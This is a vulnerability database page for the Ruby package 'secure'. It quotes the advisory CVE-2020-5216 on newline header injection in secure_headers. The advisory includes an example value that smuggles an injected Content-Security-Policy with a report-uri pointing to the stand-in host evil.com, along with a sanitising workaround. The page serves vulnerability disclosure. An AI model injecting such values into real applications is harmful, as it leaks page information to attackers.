VulnerableCode Package Details - pkg:gem/secure

Search for packages

Vulnerability	Summary	Fixed by
This package is not known to be affected by vulnerabilities.

Vulnerability

Summary

Fixed by

This package is not known to be affected by vulnerabilities.

Vulnerability	Summary	Aliases
VCID-mr8k-d23n-e3c6	secure_headers header injection due to newline If user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection. Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy header with the remaining value of the original string. It will continue to create new headers for each newline. e.g. ``` override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"]) ``` would result in ``` Content-Security-Policy: ... script-src: mycdn.com Content-Security-Policy: injected Content-Security-Policy: rest-of-the-header ``` CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial: ``` override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"]) ``` ``` Content-Security-Policy: ... script-src: mycdn.com Content-Security-Policy: default-src 'none'; report-uri evil.com Content-Security-Policy: rest-of-the-header ``` Workarounds ``` override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")]) ```	CVE-2020-5216 GHSA-w978-rmpf-qmwg

Vulnerability

Summary

Aliases

VCID-mr8k-d23n-e3c6

secure_headers header injection due to newline If user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection. Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy header with the remaining value of the original string. It will continue to create new headers for each newline. e.g. ``` override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"]) ``` would result in ``` Content-Security-Policy: ... script-src: mycdn.com Content-Security-Policy: injected Content-Security-Policy: rest-of-the-header ``` CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial: ``` override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"]) ``` ``` Content-Security-Policy: ... script-src: mycdn.com Content-Security-Policy: default-src 'none'; report-uri evil.com Content-Security-Policy: rest-of-the-header ``` Workarounds ``` override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")]) ```

CVE-2020-5216
GHSA-w978-rmpf-qmwg

Date	Actor	Action	Vulnerability	Source	VulnerableCode Version
2026-06-04T20:26:37.087814+00:00	GitLab Importer	Fixing	VCID-mr8k-d23n-e3c6	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/gem/secure_headers/CVE-2020-5216.yml	38.6.0

2026-06-04T20:26:37.087814+00:00

GitLab Importer

Fixing

VCID-mr8k-d23n-e3c6

https://gitlab.com/gitlab-org/advisories-community/-/blob/main/gem/secure_headers/CVE-2020-5216.yml

38.6.0